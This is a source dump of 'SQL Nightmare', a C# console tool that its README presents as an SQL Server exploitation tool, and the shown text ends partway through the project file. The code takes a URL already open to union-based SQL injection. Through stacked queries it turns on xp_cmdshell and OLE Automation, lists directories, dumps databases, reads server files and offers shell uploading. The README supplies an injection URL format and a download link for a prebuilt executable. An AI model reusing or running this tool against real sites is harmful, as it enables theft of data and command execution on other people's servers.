├── SQL-nightmare
    ├── obj
    │   └── Debug
    │   │   ├── TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
    │   │   ├── TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
    │   │   ├── TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
    │   │   └── SQL-nightmare.csproj.FileListAbsolute.txt
    ├── App.config
    ├── bin
    │   └── Debug
    │   │   ├── SQL-nightmare.exe.config
    │   │   ├── SQL-nightmare.vshost.exe.config
    │   │   └── SQL-nightmare.vshost.exe.manifest
    ├── FileIO.cs
    ├── Properties
    │   └── AssemblyInfo.cs
    ├── Exploitation.cs
    ├── Program.cs
    ├── UserInteraction.cs
    ├── Log.cs
    ├── QueryCrafter.cs
    ├── HTTPMethods.cs
    ├── ResponseFilter.cs
    ├── ReadFile.cs
    ├── XML.cs
    ├── SQL-nightmare.csproj
    ├── DirListing.cs
    ├── DumpData.cs
    ├── ShellSpawning.cs
    └── QueriesDB.cs
├── SQL-nightmare.sln
├── LICENSE
└── README.md


/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/SQL-nightmare/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.exe.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.vshost.exe.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
5 |     </startup>
6 | </configuration>


--------------------------------------------------------------------------------
/SQL-nightmare/bin/Debug/SQL-nightmare.vshost.exe.manifest:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
 2 | <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
 3 |   <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
 4 |   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
 5 |     <security>
 6 |       <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
 7 |         <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
 8 |       </requestedPrivileges>
 9 |     </security>
10 |   </trustInfo>
11 | </assembly>
12 | 


--------------------------------------------------------------------------------
/SQL-nightmare/obj/Debug/SQL-nightmare.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.exe.config
2 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.csprojResolveAssemblyReference.cache
3 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.exe
4 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\bin\Debug\SQL-nightmare.pdb
5 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.exe
6 | c:\users\neo root\documents\visual studio 2013\Projects\SQL-nightmare\SQL-nightmare\obj\Debug\SQL-nightmare.pdb
7 | 


--------------------------------------------------------------------------------
/SQL-nightmare/FileIO.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | using System.IO;
 5 | 
 6 | namespace SQL_nightmare
 7 | {
 8 |     class FileIO
 9 |     {
10 |         public static void deleteTempFile(string fileName)
11 |         {
12 |             if (File.Exists(fileName))
13 |                 File.Delete(fileName);
14 |         }
15 | 
16 |         public static bool createWriteFile(string contents, string fileName)
17 |         {
18 |             try
19 |             {
20 |                 using (StreamWriter sw = new StreamWriter(fileName))
21 |                 {
22 |                     sw.Write(contents);
23 |                     sw.Flush();
24 |                     return true;
25 |                 }
26 |             }
27 |             catch (Exception ex)
28 |             {
29 |                 Log.logError(ex.Message);
30 |                 return false;
31 |             }
32 |         }
33 |     }
34 | }
35 | 


--------------------------------------------------------------------------------
/SQL-nightmare.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2013
 4 | VisualStudioVersion = 12.0.21005.1
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQL-nightmare", "SQL-nightmare\SQL-nightmare.csproj", "{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | EndGlobal
23 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | The MIT License (MIT)
 2 | 
 3 | Copyright (c) 2015 Rummy Khan
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy of
 6 | this software and associated documentation files (the "Software"), to deal in
 7 | the Software without restriction, including without limitation the rights to
 8 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 9 | the Software, and to permit persons to whom the Software is furnished to do so,
10 | subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
17 | FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
18 | COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
19 | IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # SQL Nightmare
 2 | An SQL SERVER Exploitation tool
 3 | 
 4 | #### Executable
 5 | Since this is source code, you can download exe from here [SQL Nightmare](https://www.dropbox.com/s/tld2ta55rajgcgf/SQL-nightmare.exe?dl=0)
 6 | 
 7 | #### Functions
 8 | 1. Server Directory navigation.
 9 | 2. Server Database Dump.
10 | 3. Read Server Files.
11 | 4. Shell spawining.
12 | 
13 | #### Input URL Format
14 | `http://localhost:1234/index.aspx?param=1 AND 0 union select 1,'rummykhan',2 --X-`
15 | 
16 | Replace the string/vulnerable column to 'rummykhan' and ending comments to --X-
17 | 
18 | #### Disclaimer
19 | 1. This software was written for educational purposes only. 
20 | 2. Don't use it on any site without prior permission of site owner. 
21 | 
22 | 
23 | #### Contact
24 | Drop me an email at <a href="mailto:rehan_manzoor@outlook.com">rehan_manzoor@outlook.com</a>
25 | 
26 | #### MIT License
27 | This software is licensed under [The MIT License (MIT)](LICENSE).
28 | 
29 | 
30 | #### With Love for
31 | | Lafangoo | Connecting | Ch3rn0by1 | exploiter-z | PMH`s Str!k3r | Makman | Madcode |  g00n | benzi | Ricardo | Ajkaro | SOG | Jin | Zee-PK | Gujjar | Ashx | h98d (Hussein) | Muhammad Bilal |


--------------------------------------------------------------------------------
/SQL-nightmare/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following 
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("SQL-nightmare")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SQL-nightmare")]
13 | [assembly: AssemblyCopyright("Copyright ©  2015")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible 
18 | // to COM components.  If you need to access a type in this assembly from 
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("612b3038-cb9a-4462-b8f3-854500a7f846")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version 
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers 
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/SQL-nightmare/Exploitation.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class Exploitation
 8 |     {
 9 |         public static void initialize(string url)
10 |         {
11 |             enableOLEAutomation(url);
12 |             enableXPCMDShell(url);
13 |         }
14 | 
15 |         public static bool enableOLEAutomation(string url)
16 |         {
17 |             string OLEAutomationEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableOLEAutomation);
18 |             OLEAutomationEnablingQuery = OLEAutomationEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
19 | 
20 |             if (ResponseFilter.confirmResponce(OLEAutomationEnablingQuery, QueriesDB.Replacement))
21 |             {
22 |                 Log.logOutput("OLE Automation Enabled..");
23 |                 return true;
24 |             }
25 |             Log.logError("Failed to Enable OLE Automation Procedures..");
26 |             return false;
27 |         }
28 | 
29 |         public static bool enableXPCMDShell(string url)
30 |         {
31 |             string XPCMDShellEnablingQuery = QueryCrafter.constructStackedQuery(url, QueriesDB.EnableXPCMDShell);
32 |             XPCMDShellEnablingQuery = XPCMDShellEnablingQuery.Replace("'rummykhan'", QueriesDB.Replacement);
33 | 
34 |             if (ResponseFilter.confirmResponce(XPCMDShellEnablingQuery, QueriesDB.Replacement))
35 |             {
36 |                 Log.logOutput("XP CMD Shell Enabled..");
37 |                 return true;
38 |             }
39 |             Log.logError("Failed to Enable XP CMD Shell..");
40 |             return false;
41 |         }
42 |     }
43 | }
44 | 


--------------------------------------------------------------------------------
/SQL-nightmare/Program.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Text;
 5 | using System.Threading.Tasks;
 6 | 
 7 | namespace SQL_nightmare
 8 | {
 9 |     class Program
10 |     {
11 |         static void Main(string[] args)
12 |         {
13 |             QueriesDB.initialize();
14 | 
15 |             UserInteraction.showBanner();
16 | 
17 |             string basicURL = null;
18 | 
19 |             while (basicURL != "x")
20 |             {
21 |                 basicURL = null;
22 |                 Log.logNotification("Press 'x' for exit..");
23 | 
24 |                 UserInteraction.promptForUserInput("Enter url");
25 |                 basicURL = Console.ReadLine();
26 | 
27 |                 Exploitation.initialize(basicURL);
28 | 
29 | 
30 |                 if (basicURL != "x" && !String.IsNullOrEmpty(basicURL))
31 |                 {
32 |                     int Choice = -1;
33 | 
34 |                     while (Choice != 0)
35 |                     {
36 |                         Choice = UserInteraction.showMenuForIntChoice("Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.." +
37 |                         "\nPress '3' for files reading..\nPress '4' for shell uploading..");
38 | 
39 |                         if (Choice == 1)
40 |                             DirListing.initialize(basicURL);
41 |                         else if (Choice == 2)
42 |                             DumpData.initialize(basicURL);
43 |                         else if (Choice == 3)
44 |                             ReadFile.Read(basicURL);
45 |                         else if (Choice == 4)
46 |                             ShellSpawning.Spawn(basicURL);
47 |                     }
48 |                 }
49 |             }
50 | 
51 |             Log.logOutput("Program is going to exit.. Press any key..");
52 |             Console.ReadKey();
53 |         }
54 |     }
55 | }
56 | 


--------------------------------------------------------------------------------
/SQL-nightmare/UserInteraction.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class UserInteraction
 8 |     {
 9 |         public static void showBanner()
10 |         {
11 |             Console.Title = "rummykhan's SQLi";
12 |             Console.ForegroundColor = ConsoleColor.Red;
13 |             Console.WriteLine("\t\t\t\t: Love For :\n | Lafangoo | Ch3rn0by1 | Connecting | exploiter-z | Gujjar (PCP) | rootxx |\n\t |PMH's Str!k3r -" +
14 |                               "Rafay Baloch -Jin -hussein(h98d) -Zen -Rahul| \n\t\t|MakMan--madCodE--Blackhawk--Ajkaro--benzi| ");
15 |             Console.WriteLine();
16 |         }
17 | 
18 |         public static string takeInputForTableFileGeneration()
19 |         {
20 |             promptForUserInput("Enter Name for File");
21 |             string fileName = Console.ReadLine();
22 | 
23 |             fileName += (new Random().Next(123456789)).ToString();
24 |             return fileName + ".txt";
25 |         }
26 | 
27 |         public static void promptForUserInput(string message)
28 |         {
29 |             Console.ForegroundColor = ConsoleColor.Blue;
30 |             Console.Write(message + " :: ");
31 |         }
32 |         
33 |         public static int showMenuForIntChoice(string message)
34 |         {
35 |             promptForUserInput(message);
36 | 
37 |             string userInputString = Console.ReadLine();
38 |             int userInputInt = 0;
39 | 
40 |             if (int.TryParse(userInputString, out userInputInt))
41 |                 return userInputInt;
42 |             else
43 |             {
44 |                 Log.logError("Bad input");
45 |                 return -1;
46 |             }
47 | 
48 |         }
49 | 
50 |         public static string takeInputString(string message)
51 |         {
52 |             promptForUserInput(message);
53 |             return Console.ReadLine();
54 |         }
55 |     }
56 | }
57 | 


--------------------------------------------------------------------------------
/SQL-nightmare/Log.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class Log
 8 |     {
 9 |         public static void logError(string message)
10 |         {
11 |             Console.ForegroundColor = ConsoleColor.Red;
12 |             Console.WriteLine("[ERROR] " + message + " [ERROR]");
13 |         }
14 | 
15 |         public static void logOutput(string message)
16 |         {
17 |             Console.ForegroundColor = ConsoleColor.Green;
18 |             Console.WriteLine(message);
19 |         }
20 | 
21 |         public static void logNotification(string message)
22 |         {
23 |             Console.ForegroundColor = ConsoleColor.Gray;
24 |             Console.WriteLine("[INFO] " + message);
25 |         }
26 | 
27 |         public static void showObjects(string[] objects, string title)
28 |         {
29 |             try
30 |             {
31 |                 logOutput("--[ " + title + "(s) START ]--");
32 |                 for (int i = 0; i < objects.Length; i++)
33 |                 {
34 |                     logOutput("[" + (i + 1) + "] = " + objects[i]);
35 |                 }
36 |                 logOutput("--[ " + title + "(s) END ]--");
37 |             }
38 |             catch (NullReferenceException ex)
39 |             {
40 |                 logError(ex.Message);
41 |             }
42 |         }
43 | 
44 |         public static void showObjects(List<string> objects, string title)
45 |         {
46 |             try
47 |             {
48 |                 logOutput("--[ " + title + " START ]--");
49 |                 for (int i = 0; i < objects.Count; i++)
50 |                 {
51 |                     logOutput("[" + (i + 1) + "] = " + objects[i]);
52 |                 }
53 |                 logOutput("--[ " + title + " END ]--");
54 |             }
55 |             catch (NullReferenceException ex)
56 |             {
57 |                 logError(ex.Message);
58 |             }
59 |         }
60 | 
61 |     }
62 | }
63 | 


--------------------------------------------------------------------------------
/SQL-nightmare/QueryCrafter.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class QueryCrafter
 8 |     {
 9 |         public static string constructURLForOutputFromTempTable(string url)
10 |         {
11 |             url = url.Replace("'rummykhan'", "oxp");
12 |             url = url.Replace("--X-", " FROM xrummyTables--X-");
13 |             return url;
14 |         }
15 | 
16 |         public static string constructURLForDroppingObject(string url, string dropTableStackedQuery)
17 |         {
18 |             return url.Replace("--X-", dropTableStackedQuery);
19 |             
20 |         }
21 | 
22 |         public static string constructURLForConfirmation(string url, string _replacement)
23 |         {
24 |             return url.Replace("rummykhan", _replacement);
25 |         }
26 | 
27 |         public static string construcQueryForTableDump(string url, string stackedQuery, string _replacement)
28 |         {
29 |             string newUrl = url.Replace("rummykhan", _replacement);
30 | 
31 |             return newUrl.Replace("--X-", stackedQuery);
32 |         }
33 | 
34 |         public static string constructQueryForColumns(string columnStackedQuery, string tableName)
35 |         {
36 |             return columnStackedQuery.Replace("[TABLENAME]", "'" + tableName + "'");
37 |         }
38 | 
39 |         public static string constructQueryForDataDump(string url, string tableName, string tableDumpQuery)
40 |         {
41 |             url = url.Replace("'rummykhan'", tableDumpQuery);
42 |             url = url.Replace("TABLENAME", tableName);
43 |             return url;
44 |         }
45 | 
46 |         public static string constructStackedQuery(string url, string queryToAttachAtEnd)
47 |         {
48 |             return url.Replace("--X-", queryToAttachAtEnd);
49 |         }
50 | 
51 |         public static string constructQueryForSelectObject(string url, string objectVerifyingQuery)
52 |         {
53 |             return url.Replace("'rummykhan'", objectVerifyingQuery);
54 |         }
55 |     }
56 | }
57 | 


--------------------------------------------------------------------------------
/SQL-nightmare/HTTPMethods.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | using System.Web;
 5 | using System.Net;
 6 | using System.IO;
 7 | 
 8 | namespace SQL_nightmare
 9 | {
10 |     class HTTPMethods
11 |     {
12 |         public static string getResponse(string url)
13 |         {
14 |             try
15 |             {
16 |                 HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
17 |                 request.Method = "GET";
18 |                 request.Timeout = 500000;
19 | 
20 |                 using (var response = request.GetResponse())
21 |                 using (var stream = response.GetResponseStream())
22 |                 using (var reader = new StreamReader(stream))
23 |                 {
24 |                     HttpStatusCode statusCode = ((HttpWebResponse)response).StatusCode;
25 |                     string contents = reader.ReadToEnd();
26 |                     return HttpUtility.HtmlDecode(contents);
27 |                 }
28 |             }
29 |             catch (WebException wc)
30 |             {
31 |                 try
32 |                 {
33 |                     WebResponse wr = (WebResponse)wc.Response;
34 |                     using (var stream = wr.GetResponseStream())
35 |                     using (var reader = new StreamReader(stream))
36 |                     {
37 |                         string contents = reader.ReadToEnd();
38 |                         return HttpUtility.HtmlDecode(contents);
39 |                     }
40 |                 }
41 |                 catch (NullReferenceException ex)
42 |                 {
43 |                     Log.logError("Plz check you internet connection OR website has blocked you ip - TimeOUT");
44 |                     return null;
45 |                 }
46 |             }
47 |             catch (UriFormatException ex)
48 |             {
49 |                 Log.logError(ex.Message);
50 |                 return null;
51 |             }
52 |             catch (NullReferenceException ex)
53 |             {
54 |                 Log.logError(ex.Message);
55 |                 return null;
56 |             }
57 |         }
58 | 
59 |     }
60 | }
61 | 


--------------------------------------------------------------------------------
/SQL-nightmare/ResponseFilter.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class ResponseFilter
 8 |     {
 9 |         public static string[] parseResponce(string response)
10 |         {
11 |             try
12 |             {
13 |                 if (response != null)
14 |                 {
15 |                     return response.Split(':');
16 |                 }
17 |                 else
18 |                     return null;
19 |             }
20 |             catch (Exception ex)
21 |             {
22 |                 Log.logError(ex.Message);
23 |                 return null;
24 | 
25 |             }
26 |         }
27 | 
28 |         public static string getPureResponse(string response)
29 |         {
30 |             try
31 |             {
32 | 
33 |                 int start = response.IndexOf("x102x:");
34 |                 int end = response.IndexOf(":x102y");
35 |                 int contentLength = end - start;
36 |                 response = response.Substring(start, contentLength);
37 |                 return response.Replace("x102x:", "");
38 |             }
39 |             catch (Exception ex)
40 |             {
41 |                 Log.logError(" while parsing response : " + ex.Message);
42 |                 return null;
43 |             }
44 |         }
45 | 
46 |         public static string getPureResponseWithLastIndex(string response)
47 |         {
48 |             try
49 |             {
50 | 
51 |                 int start = response.LastIndexOf("x102x:");
52 |                 int end = response.LastIndexOf(":x102y");
53 |                 int contentLength = end - start;
54 |                 response = response.Substring(start, contentLength);
55 |                 return response.Replace("x102x:", "");
56 |             }
57 |             catch (Exception ex)
58 |             {
59 |                 Log.logError(" while parsing response : " + ex.Message);
60 |                 return null;
61 |             }
62 |         }
63 | 
64 |         public static bool confirmResponce(string url, string _replacement)
65 |         {
66 |             try
67 |             {
68 |                 if (HTTPMethods.getResponse(url).Contains(_replacement))
69 |                     return true;
70 |                 else
71 |                     return false;
72 |             }
73 |             catch (NullReferenceException ex)
74 |             {
75 |                 Log.logError("No Responce returned from the Server");
76 |                 return false;
77 |             }
78 |         }
79 |     }
80 | }
81 | 


--------------------------------------------------------------------------------
/SQL-nightmare/ReadFile.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Text;
 4 | 
 5 | namespace SQL_nightmare
 6 | {
 7 |     class ReadFile
 8 |     {
 9 |         public static void Read(string url)
10 |         {
11 |             string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
12 |             string UserChoice = "z";
13 |             while (UserChoice != "x")
14 |             {
15 |                 UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext ..");
16 |                 if (UserChoice != "x")
17 |                 {
18 |                     string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice);
19 |                     var response = HTTPMethods.getResponse(FinalFileReadURL);
20 |                     if (response != null)
21 |                     {
22 |                         response = ResponseFilter.getPureResponseWithLastIndex(response);
23 |                         if (response != null)
24 |                         {
25 |                             Log.logOutput("--- [File Contents Start]  ---");
26 |                             Log.logOutput(response);
27 |                             Log.logOutput("--- [File Cotents End] ---");
28 | 
29 |                             UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore..");
30 | 
31 |                             if (UserChoice == "s")
32 |                                 SaveFile(response);
33 | 
34 |                             UserChoice = "z";
35 | 
36 |                         }
37 |                         else
38 |                             Log.logError("Either File is empty or you 've no right to read that File..");
39 |                     }
40 |                 }
41 |             }
42 |         }
43 | 
44 |         public static void SaveFile(string fileContents)
45 |         {
46 |             string fileName = UserInteraction.takeInputForTableFileGeneration();
47 |             
48 |             FileIO.createWriteFile(fileContents, fileName);
49 | 
50 |             Log.logOutput("File saved with name : " + fileName);
51 |         }
52 | 
53 |         public static string ReadFileDirect(string url, string fileName)
54 |         {
55 |             string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery);
56 | 
57 |             string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", fileName);
58 | 
59 |             var response = HTTPMethods.getResponse(FinalFileReadURL);
60 |             
61 |             if (response != null)
62 |             {
63 |                 response = ResponseFilter.getPureResponseWithLastIndex(response);
64 |                 if (response != null)
65 |                 {
66 |                     response = response.Replace(" ", "");
67 |                     return response;
68 |                 }
69 |                 else
70 |                     return null;
71 |             }
72 |             else
73 |                 return null;
74 |         }
75 |     }
76 | }
77 | 


--------------------------------------------------------------------------------
/SQL-nightmare/XML.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.IO;
 4 | using System.Text;
 5 | using System.Xml;
 6 | 
 7 | namespace SQL_nightmare
 8 | {
 9 |     class XML
10 |     {
11 |         public static string addRoot(string response)
12 |         {
13 |             response = "<xoxo>" + response + "</xoxo>";
14 |             return response;
15 |         }
16 | 
17 |         public static void parseXML(string tableName, string fileNameToWrite, string[] columnsToDisplay)
18 |         {
19 |             int counter = 1;
20 |             XmlDocument xDoc = new XmlDocument();
21 | 
22 |             xDoc.Load("tmp.txt");
23 | 
24 |             XmlNodeList nodeList = xDoc.GetElementsByTagName(tableName);
25 | 
26 |             using (StreamWriter sw = new StreamWriter(fileNameToWrite))
27 |             {
28 |                 sw.WriteLine("Table : " + tableName);
29 |                 sw.Flush();
30 |                 Log.logOutput("---------------------------------------------------------------------------");
31 |                 sw.WriteLine("---------------------------------------------------------------------------");
32 |                 sw.Flush();
33 | 
34 |                 string columns = "|";
35 |                 foreach (var item in columnsToDisplay)
36 |                 {
37 |                     columns += "\t" + item + "\t|";
38 |                 }
39 | 
40 |                 Log.logOutput(columns);
41 | 
42 |                 sw.WriteLine(columns);
43 |                 sw.Flush();
44 | 
45 |                 Log.logOutput("---------------------------------------------------------------------------");
46 |                 sw.Flush();
47 | 
48 |                 foreach (XmlNode node in nodeList)
49 |                 {
50 |                     string oneRecord = "|";
51 |                     foreach (XmlAttribute attribute in node.Attributes)
52 |                     {
53 |                         oneRecord += "\t" + attribute.Value + "\t| ";
54 |                     }
55 |                     Log.logOutput(oneRecord);
56 | 
57 |                     sw.WriteLine(oneRecord);
58 |                     sw.Flush();
59 |                     Log.logOutput("---------------------------------------------------------------------------");
60 |                     sw.Flush();
61 |                     counter++;
62 |                 }
63 |             }
64 |         }
65 | 
66 |         public static List<string> parseXML(string xmlFileName, string tagName)
67 |         {
68 |             try
69 |             {
70 |                 List<string> dirInfo = new List<string>();
71 |                 XmlDocument xDoc = new XmlDocument();
72 |                 xDoc.Load(xmlFileName);
73 |                 XmlNodeList nodeList = xDoc.GetElementsByTagName(tagName);
74 |                 foreach (XmlNode node in nodeList)
75 |                 {
76 |                     dirInfo.Add(node.Attributes[0].Value);
77 |                 }
78 |                 return dirInfo;
79 |             }
80 |             catch (Exception ex)
81 |             {
82 |                 Log.logError(ex.Message);
83 |                 return null;
84 |             }
85 |         }
86 | 
87 |     }
88 | }
89 | 


--------------------------------------------------------------------------------
/SQL-nightmare/SQL-nightmare.csproj:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="12.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
 4 |   <PropertyGroup>
 5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
 6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
 7 |     <ProjectGuid>{EA751B20-26A5-463B-9B2C-3B85ED0A73D5}</ProjectGuid>
 8 |     <OutputType>Exe</OutputType>
 9 |     <AppDesignerFolder>Properties</AppDesignerFolder>
10 |     <RootNamespace>SQL_nightmare</RootNamespace>
11 |     <AssemblyName>SQL-nightmare</AssemblyName>
12 |     <TargetFrameworkVersion>v4.5</TargetFrameworkVersion>
13 |     <FileAlignment>512</FileAlignment>
14 |   </PropertyGroup>
15 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 |     <PlatformTarget>AnyCPU</PlatformTarget>
17 |     <DebugSymbols>true</DebugSymbols>
18 |     <DebugType>full</DebugType>
19 |     <Optimize>false</Optimize>
20 |     <OutputPath>bin\Debug\</OutputPath>
21 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
22 |     <ErrorReport>prompt</ErrorReport>
23 |     <WarningLevel>4</WarningLevel>
24 |   </PropertyGroup>
25 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
26 |     <PlatformTarget>AnyCPU</PlatformTarget>
27 |     <DebugType>pdbonly</DebugType>
28 |     <Optimize>true</Optimize>
29 |     <OutputPath>bin\Release\</OutputPath>
30 |     <DefineConstants>TRACE</DefineConstants>
31 |     <ErrorReport>prompt</ErrorReport>
32 |     <WarningLevel>4</WarningLevel>
33 |   </PropertyGroup>
34 |   <ItemGroup>
35 |     <Reference Include="System" />
36 |     <Reference Include="System.Core" />
37 |     <Reference Include="System.Web" />
38 |     <Reference Include="System.Xml.Linq" />
39 |     <Reference Include="System.Data.DataSetExtensions" />
